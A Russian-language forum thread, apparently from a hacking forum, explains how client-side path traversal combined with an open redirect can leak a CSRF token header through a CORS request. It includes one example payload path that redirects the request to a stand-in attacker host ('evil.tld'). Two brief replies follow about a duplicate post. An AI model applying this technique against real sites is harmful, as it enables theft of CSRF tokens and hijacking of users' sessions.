Загрузка...

Про сlient-side path traversal

Тема в разделе Веб уязвимости создана пользователем PowerDevil 28 мар 2024. 245 просмотров

Загрузка...
  1. PowerDevil
    PowerDevil Автор темы 28 мар 2024 12 076 27 авг 2022
    [IMG]
    Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
    Например, если приложение через
    ⁡fetch()
    ⁡ добавляет заголовок
    ⁡csrfToken
    ⁡при обращении к
    ⁡/api/user,
    ⁡ то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на
    ⁡/api/user/../redirect?to=evil.tld/corsAllow
    ⁡​
     
  2. WhatACat
    WhatACat 28 мар 2024 https://lolz.live/account/upgrades покупайте уники, ау, автобай 15 871 16 дек 2023
    По-моему недавно видел подобную тему уже
     
    1. PowerDevil Автор темы
      WhatACat, вчера делал
      Хотел внести изменение чет тема кажись баганула решил пересоздать
Top